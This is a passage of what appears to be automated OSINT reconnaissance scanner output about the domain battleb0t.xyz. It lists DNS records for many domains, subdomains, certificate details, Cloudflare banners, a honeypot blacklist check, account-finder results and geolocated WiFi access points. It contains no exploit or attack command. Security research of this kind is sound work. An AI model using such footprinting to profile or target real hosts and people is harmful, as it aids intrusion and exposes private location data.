"www.vanessaduque.studio": {"record_type": "CNAME", "resolved_at": "2022-10-27T17:43:30.429661358Z"}, "meteo-parapente.github.io": {"record_type": "A", "resolved_at": "2023-03-17T16:27:19.176274732Z"}, "www.secure-ai.systems": {"record_type": "CNAME", "resolved_at": "2023-04-02T00:00:07.499451114Z"}, "minigrid.farama.org": {"record_type": "CNAME", "resolved_at": "2023-03-31T03:15:36.295656175Z"}, "thivvyan.tech": {"record_type": "A", "resolved_at": "2023-03-17T19:22:41.845128424Z"}, "caderichard.com": {"record_type": "A", "resolved_at": "2023-03-17T13:39:16.909350033Z"}, "www.funmitoblessed.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T14:40:07.732044366Z"}, "api.kekesi.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:57:13.673998398Z"}, "www.rowanmanning.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:54:15.722717563Z"}, "www.vishvak.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T05:45:50.510079142Z"}, "mmjlee.github.io": {"record_type": "A", "resolved_at": "2023-03-14T00:28:15.909008635Z"}, "www.phorgr.com": {"record_type": "CNAME", "resolved_at": "2022-11-21T13:38:18.017307639Z"}, "blog.tecnual.com": {"record_type": "CNAME", "resolved_at": "2023-05-01T15:39:55.545500428Z"}, "www.machproductions.com": {"record_type": "CNAME", "resolved_at": "2023-04-16T15:08:16.718595727Z"}, "comics.bilardi.net": {"record_type": "CNAME", "resolved_at": "2023-05-08T19:49:11.854401544Z"}, "www.littlejohnengineering.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-17T19:35:20.132850023Z"}, "www.dokomado.com": {"record_type": "CNAME", "resolved_at": "2023-04-21T22:50:25.934348288Z"}, "www.trivial.group": {"record_type": "CNAME", "resolved_at": "2023-02-22T16:56:04.473316622Z"}, "alzhao.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:58:23.599756683Z"}, "p316.net": {"record_type": "A", "resolved_at": "2023-05-03T20:00:25.592728888Z"}, "www.thesimson.net": {"record_type": "A", "resolved_at": "2023-05-10T19:50:34.643893649Z"}, "gmacd.net": {"record_type": "A", "resolved_at": "2023-04-27T21:00:21.802895223Z"}, "www.ericdallo.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:26.937961924Z"}, "gmacd.github.io": {"record_type": "A", "resolved_at": "2023-03-21T01:31:25.465960326Z"}, "www.harrisosserman.com": {"record_type": "CNAME", "resolved_at": "2023-02-28T14:03:52.247193728Z"}, "kleinsplayground.com": {"record_type": "A", "resolved_at": "2023-03-22T18:44:01.108063584Z"}, "funmitoblessed.github.io": {"record_type": "A", "resolved_at": "2023-03-22T11:31:23.278745293Z"}, "qfield.org": {"record_type": "A", "resolved_at": "2023-03-12T17:49:56.752630209Z"}, "asm.lucasteske.dev": {"record_type": "CNAME", "resolved_at": "2022-11-14T14:35:22.539258750Z"}, "induja.me": {"record_type": "A", "resolved_at": "2023-03-04T17:10:57.729332623Z"}, "agnias47.github.io": {"record_type": "A", "resolved_at": "2023-03-14T15:57:58.140445992Z"}, "www.alleviationwellnesschiro.com": {"record_type": "A", "resolved_at": "2023-05-06T13:30:08.484568914Z"}, "klopfenstein.org": {"record_type": "A", "resolved_at": "2023-03-01T19:20:02.059355976Z"}, "mjlee.dev": {"record_type": "A", "resolved_at": "2023-03-15T23:01:22.092009794Z"}, "dokomado.com": {"record_type": "A", "resolved_at": "2023-03-12T13:46:45.810442245Z"}, "modelr.tidyverse.org": {"record_type": "CNAME", "resolved_at": "2023-03-10T17:30:47.271697893Z"}, "www.eknert.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T21:55:19.776247657Z"}, "mormannorman.chesterfieldschools.net": {"record_type": "CNAME", "resolved_at": "2023-04-03T19:11:55.285332304Z"}, "millinow.com": {"record_type": "A", "resolved_at": "2022-09-26T14:09:37.255614081Z"}, "braavos.app": {"record_type": "A", "resolved_at": "2022-10-02T12:04:48.017779237Z"}, "turtledev.in": {"record_type": "A", "resolved_at": "2023-03-17T16:23:43.722396430Z"}, "wolfgangbai.top": {"record_type": "CNAME", "resolved_at": "2023-03-08T00:37:57.090239320Z"}, "www.orange-outsourcing.com": {"record_type": "CNAME", "resolved_at": "2023-04-24T15:30:44.956112894Z"}, "visbol.org": {"record_type": "CNAME", "resolved_at": "2023-03-11T19:10:21.996256557Z"}, "www.lunadias.online": {"record_type": "A", "resolved_at": "2022-10-28T16:39:21.566059040Z"}, "xyaman.xyz": {"record_type": "A", "resolved_at": "2023-04-23T21:50:04.311882749Z"}, "docs.aslbeverlygreen1.fr": {"record_type": "CNAME", "resolved_at": "2023-03-23T18:15:37.208305943Z"}, "maxkross.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:04.714610636Z"}, "arthurkarrer.me": {"record_type": "A", "resolved_at": "2023-03-11T16:57:07.559804549Z"}, "jarrodboone.info": {"record_type": "A", "resolved_at": "2023-03-06T16:41:45.613039480Z"}, "editor.ifmledit.org": {"record_type": "CNAME", "resolved_at": "2023-03-19T20:27:36.604759792Z"}, "assets.javierarce.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T15:20:51.562601099Z"}, "www.tastey.tech": {"record_type": "CNAME", "resolved_at": "2023-02-28T18:50:09.161433327Z"}, "sandrine.barillot.me": {"record_type": "CNAME", "resolved_at": "2023-03-12T16:19:18.691253010Z"}, "unitedanimations.info": {"record_type": "A", "resolved_at": "2023-01-29T02:20:44.771224615Z"}, "cyberfriendscircle.io": {"record_type": "A", "resolved_at": "2023-04-23T17:40:41.917214504Z"}, "dhanush.is-a.dev": {"record_type": "CNAME", "resolved_at": "2023-03-09T23:39:54.025920340Z"}, "static.test.habuhome.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:22:37.725893073Z"}, "www.jtjan.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T02:40:52.835663110Z"}, "wise.fitness": {"record_type": "A", "resolved_at": "2023-03-07T15:51:26.458635165Z"}, "theodd.website": {"record_type": "A", "resolved_at": "2023-03-19T03:21:30.685920747Z"}, "djalyssa.ru": {"record_type": "A", "resolved_at": "2023-04-22T20:21:58.054821229Z"}, "www.unixlife.dev": {"record_type": "CNAME", "resolved_at": "2022-10-04T14:32:50.060827864Z"}, "www.kadupitiya.lk": {"record_type": "CNAME", "resolved_at": "2023-02-24T16:44:15.687183626Z"}, "robimsinazor.sk": {"record_type": "A", "resolved_at": "2023-02-22T21:18:54.646853756Z"}, "www.johnhammond.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:27.017906781Z"}, "wanderandcompass.com": {"record_type": "A", "resolved_at": "2023-03-18T22:39:25.125598440Z"}, "vishvak.com": {"record_type": "A", "resolved_at": "2023-05-11T22:16:52.855230065Z"}, "www.uocsclub.ca": {"record_type": "CNAME", "resolved_at": "2023-04-20T16:20:28.858631812Z"}, "t.iiwhy.cn": {"record_type": "CNAME", "resolved_at": "2023-03-09T12:46:57.908049390Z"}, "rpg.skmobi.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:42:56.247014800Z"}, "www.staceywu.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:59:23.259144477Z"}, "intersolarnft.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:10.689229599Z"}, "get.intersolar-nft.com": {"record_type": "CNAME", "resolved_at": "2022-09-29T13:43:22.976827994Z"}, "www.agitator.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T13:20:02.173553830Z"}, "www.teamhtp.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T05:24:15.762157977Z"}, "resume.hellodmo.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:26:25.908256359Z"}}, "names": ["kleinsplayground.com", "www.agitator.com", "maxkross.github.io", "www.vanessaduque.studio", "djalyssa.ru", "hollisis.me", "cyberfriendscircle.io", "editor.ifmledit.org", "mjlee.dev", "modelr.tidyverse.org", "www.wise.fitness", "docs.aslbeverlygreen1.fr", "www.secure-ai.systems", "visbol.org", "viameumie.ivankz.com", "meteo-parapente.github.io", "sean | 185.199.109.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | codeforces (Category: coding)
https://codeforces.com/profile/login | login |
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 204 | 0 | 1 | 0 | None | 185.199.111.153 | battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c564d9c4d65692b-FRA
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.47): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:17 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 02:32:42 (Net ID: 00:02:2D:01:53:95) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | #LG@Vo1P*Service& (Net ID: 00:01:36:57:A4:17) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Jupiter (Net ID: 00:02:2D:66:D2:49) | 50.1188, 8.6843 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Microsoft Technet Community (Category: tech)
https://social.technet.microsoft.com/profile/login/ | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomAC2DD8 (Net ID: 00:0C:F6:AC:2D:D8) | 50.8897, 6.0563 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5e4216390f2caf-ORD
| 188.114.96.1 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT8QH8gLT (Net ID: E0:22:02:14:AB:06) | 37.751, -97.822 |
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
67:78:0f:c0:b3:05:0b:42:0e:1c:78:58:8a:88:56:0d
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Nov 17 08:19:18 2022 GMT
Not After : Feb 15 08:19:17 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a3:01:61:a3:c8:87:25:e7:fe:c0:1a:32:3c:c6:
da:64:8b:b5:50:60:2b:c0:e8:58:1f:54:74:29:d7:
0b:35:57:ae:f0:78:a5:6a:4d:cb:a8:98:c4:c6:08:
24:6e:38:c0:cc:16:fb:e7:ce:21:ed:5f:2c:c4:e9:
e1:ff:82:8a:ca:a0:fe:ce:4a:08:f4:8a:91:e3:98:
af:3f:35:a0:b7:82:16:66:79:8f:d4:5d:c4:1a:c4:
